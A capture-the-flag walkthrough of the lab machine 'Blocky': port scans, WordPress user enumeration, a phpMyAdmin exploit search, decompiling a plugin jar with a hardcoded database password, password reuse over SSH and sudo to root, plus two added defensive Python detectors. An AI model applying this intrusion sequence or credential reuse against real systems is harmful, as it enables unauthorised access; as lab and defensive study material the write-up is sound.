I start by modifying my /etc/hosts file to avoid writing the IP every time:
10.10.10.37 blocky
Then I look for open ports with nmap and start an OpenVAS scan:
nmap -p- blocky -Pn
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
8192/tcp closed sophos
25565/tcp open minecraft
Now I can start nmap scripts on the open ports to gather more information:
nmap -p21,22,80,8192,25565 -A -Pn blocky
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5a
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 d6:2b:99:b4:d5:e7:53:ce:2b:fc:b5:d7:9d:79:fb:a2 (RSA)
| 256 5d:7f:38:95:70:c9:be:ac:67:a0:1e:86:e7:97:84:03 (ECDSA)
|_ 256 09:d5:c2:04:95:1a:90:ef:87:56:25:97:df:83:70:67 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.8
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: BlockyCraft – Under Construction!
8192/tcp closed sophos
25565/tcp open minecraft Minecraft 1.11.2 (Protocol: 127, Message: A Minecraft Server, Users: 0/20)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Ubuntu
| Port | Service |
|---|---|
| 21/tcp | ftp |
| 22/tcp | ssh |
| 80/tcp | http |
| 25565/tcp | minecraft |
Here is the main vulnerability found by OpenVAS:
| Service | Description | Severity |
|---|---|---|
| WordPress | WordPress User IDs and User Names Disclosure | Medium |
WordPress platforms use a parameter called author. This parameter accepts integer values and represents the User ID of users in the web site. For example: http://www.example.com/?author=1. The problems found are: 1. User ID values are generated consecutively. 2. When a valid User ID is found, WordPress redirects to a web page with the name of the author.
This exploit is trivial: author=1 leads to /author/notch.
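From the defender's side, the enumeration described in the finding leaves a distinctive trace in the web server log: one client walking ?author=1, 2, 3, ... and receiving a 301 for every ID that exists. The detector below is an added example, not part of the original write-up; it assumes Apache combined log format and runs on the constructed sample lines embedded in it.

```python
import re
from collections import defaultdict
from datetime import datetime

# Apache combined log: ip - - [time] "METHOD path HTTP/x" status size "referer" "agent"
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "\S+ (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')
AUTHOR_RE = re.compile(r"[?&]author=(\d+)")
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def parse_probe(line):
    """Return (ip, timestamp, author_id, status) for a ?author=N request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    a = AUTHOR_RE.search(m.group("path"))
    if not a:
        return None
    ts = datetime.strptime(m.group("ts"), TS_FMT)
    return m.group("ip"), ts, int(a.group(1)), int(m.group("status"))

def find_enumerators(lines, min_ids=3, window_s=60):
    """Flag clients that probe >= min_ids distinct author IDs within window_s seconds.
    Returns {ip: sorted IDs WordPress confirmed with a redirect (301/302)}, i.e. the
    user names that actually leaked; IDs answered with 404 do not exist."""
    probes = defaultdict(list)
    for line in lines:
        rec = parse_probe(line)
        if rec:
            probes[rec[0]].append(rec[1:])
    flagged = {}
    for ip, events in probes.items():
        events.sort()                      # by timestamp, so the window scan below is linear
        for i, (t0, _, _) in enumerate(events):
            ids = {aid for t, aid, _ in events[i:] if (t - t0).total_seconds() <= window_s}
            if len(ids) >= min_ids:
                flagged[ip] = sorted({aid for _, aid, st in events if st in (301, 302)})
                break
    return flagged

# Constructed sample lines: one scripted sweep (10.0.0.5) and one ordinary visitor.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Jan/2024:12:00:01 +0000] "GET /?author=1 HTTP/1.1" 301 0 "-" "curl/7.68.0"
10.0.0.5 - - [10/Jan/2024:12:00:02 +0000] "GET /?author=2 HTTP/1.1" 404 1234 "-" "curl/7.68.0"
10.0.0.5 - - [10/Jan/2024:12:00:03 +0000] "GET /?author=3 HTTP/1.1" 404 1234 "-" "curl/7.68.0"
10.0.0.5 - - [10/Jan/2024:12:00:04 +0000] "GET /?author=4 HTTP/1.1" 301 0 "-" "curl/7.68.0"
192.0.2.9 - - [10/Jan/2024:12:05:00 +0000] "GET /?author=1 HTTP/1.1" 301 0 "-" "Mozilla/5.0"
192.0.2.9 - - [10/Jan/2024:12:05:30 +0000] "GET /wiki/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""
```

A single ?author= hit is normal browsing, so the threshold matters; the redirected IDs in the result are the accounts whose names are now known and worth watching at /wp-login.php.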
To gather more info I start a directory enumeration with gobuster:
gobuster dir -u http://10.10.10.37 -w Resources/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt
/wiki (Status: 301)
/wp-content (Status: 301)
/plugins (Status: 301)
/wp-includes (Status: 301)
/javascript (Status: 301)
/wp-admin (Status: 301)
/phpmyadmin (Status: 301)
I use Metasploit to retrieve the WordPress version:
msf6 auxiliary(scanner/http/wordpress_scanner) > exploit
[*] Trying 10.10.10.37
[+] 10.10.10.37 running Wordpress 4.8
It appears the version is 4.8.
In the phpMyAdmin interface I click on the ? button, which leads me to the documentation for this version of the software. There I learn that the version is 4.5.4.1.
I use searchsploit to list vulnerabilities in phpMyAdmin, and two of them stand out:
searchsploit phpmyadmin
| Exploit title | Path |
| ------------------------------------------------------------ | --------------------- |
| phpMyAdmin 4.6.2 - (Authenticated) Remote Code Execution | php/webapps/40185.py |
| WordPress Plugin Portable phpMyAdmin - Authentication Bypass | php/webapps/23356.txt |
Since the blog is using WordPress, it may be that phpMyAdmin is actually a WordPress plugin.
I use the -p option to retrieve the path to the vulnerability documentation:
searchsploit -p 23356
It turns out that the vulnerability might be too old to be used, but very interesting nonetheless:
Navigate to http://host/wp-content/plugins/portable-phpmyadmin/wp-pma-mod and you will be presented with the full portable-phpMyAdmin web interface without the requirement of a session or any credential.
Unfortunately I didn't manage to exploit it (even by using variations of the vulnerable URL) and the other
http://10.10.10.37/wp-includes/ contains a directory listing, mostly of PHP files. Unfortunately I didn't find anything interesting there.
The wiki is under construction.
This page redirects to /wp-login.php. I tried some obvious combination of user and password but nothing worked.
The plugins directory contains two files:
After decompiling BlockyCore.jar with bytecode-viewer, I find the following class, which contains a hardcoded username and password:
package com.myfirstplugin;
public class BlockyCore {
public String sqlHost = "localhost";
public String sqlUser = "root";
public String sqlPass = "8YsqfCTnvxAUeduzjNSXe22";
}
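Secrets like the one above can be caught before a plugin is deployed, and without a decompiler: javac stores a string-literal field initialiser as a CONSTANT_Utf8 entry in the class constant pool, right alongside the field name. The scanner below is an added example (not from the write-up or from the plugin's code); it walks the pool as laid out in the JVM class-file format and runs on a hand-built class fragment whose literal is a constructed placeholder, not the real password.

```python
import math, re, struct
from collections import Counter

# Payload size (after the 1-byte tag) of each fixed-width constant-pool tag; Utf8 (tag 1) is variable.
FIXED = {3: 4, 4: 4, 5: 8, 6: 8, 7: 2, 8: 2, 9: 4, 10: 4, 11: 4, 12: 4,
         15: 3, 16: 2, 17: 4, 18: 4, 19: 2, 20: 2}
NAME_HINT = re.compile(r"pass|pwd|secret|token", re.I)       # field names worth a look
SECRET_SHAPE = re.compile(r"[A-Za-z0-9!@#$%^&*_+=-]{12,}")  # a literal, not a class name or descriptor

def utf8_constants(data):
    """Walk the constant pool (JVM spec 4.4) and return every CONSTANT_Utf8 string."""
    if data[:4] != b"\xca\xfe\xba\xbe":
        raise ValueError("not a class file")
    count = struct.unpack(">H", data[8:10])[0]          # constant_pool_count
    pos, i, out = 10, 1, []
    while i < count:
        tag = data[pos]
        if tag == 1:
            ln = struct.unpack(">H", data[pos + 1:pos + 3])[0]
            out.append(data[pos + 3:pos + 3 + ln].decode("utf-8", "replace"))
            pos += 3 + ln
        else:
            pos += 1 + FIXED[tag]
        i += 2 if tag in (5, 6) else 1                    # long/double occupy two pool slots
    return out

def entropy(s):
    """Shannon entropy in bits per character."""
    return -sum(n / len(s) * math.log2(n / len(s)) for n in Counter(s).values())

def find_secrets(data, min_entropy=3.5):
    """Return (credential-looking field names, secret-looking string literals)."""
    consts = utf8_constants(data)
    hints = [c for c in consts if NAME_HINT.search(c)]
    secrets = [c for c in consts if SECRET_SHAPE.fullmatch(c) and entropy(c) >= min_entropy]
    return hints, secrets

def _utf8(s):
    return b"\x01" + struct.pack(">H", len(s.encode())) + s.encode()

# Constructed minimal class file: only the header and constant pool are needed for this check.
SAMPLE_CLASS = (
    b"\xca\xfe\xba\xbe\x00\x00\x00\x34" + struct.pack(">H", 16)    # magic, version 52, cp_count
    + _utf8("com/myfirstplugin/BlockyCore") + b"\x07\x00\x01"       # 1 Utf8, 2 Class
    + _utf8("java/lang/Object") + b"\x07\x00\x03"                   # 3 Utf8, 4 Class
    + _utf8("sqlPass") + _utf8("Ljava/lang/String;") + _utf8("ConstantValue")   # 5-7: field, descriptor, attr
    + _utf8("Xk9vQ2pLm7TrW4cZ") + b"\x08\x00\x08"                   # 8 placeholder literal, 9 String
    + _utf8("sqlHost") + _utf8("localhost") + _utf8("SourceFile") + _utf8("BlockyCore.java")  # 10-13
    + b"\x05" + b"\x00" * 8                                         # 14 Long, occupies slots 14 and 15
)
```

For a real jar, feed each .class member read through zipfile to find_secrets; a field-name hit together with a high-entropy literal in the same class is the signal to go and look.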
Everything indicates that I should try it in the phpMyAdmin interface, and it does work!
My system is not working that well with Python 2, so I use pipenv to create a virtual environment where I can run the exploit.
pipenv --python 2.7
pipenv shell
I then install requests, which is a required dependency:
pipenv install requests
I retrieve the exploit for CVE-2016-5734 with searchsploit -m 40185, which copies the exploit into the current directory.
Unfortunately the exploit doesn't work; this is because the PHP version is 7.0.18:
Details: Working only at PHP 4.3.0-5.4.6 versions [...]
At this stage I decide to see if the password I found is reusable, and the combination of the user notch with the password found gives me access to the machine.
This also gives me access to the user flag. The user notch is great: he has sudo rights!
This gives me access to the root flag.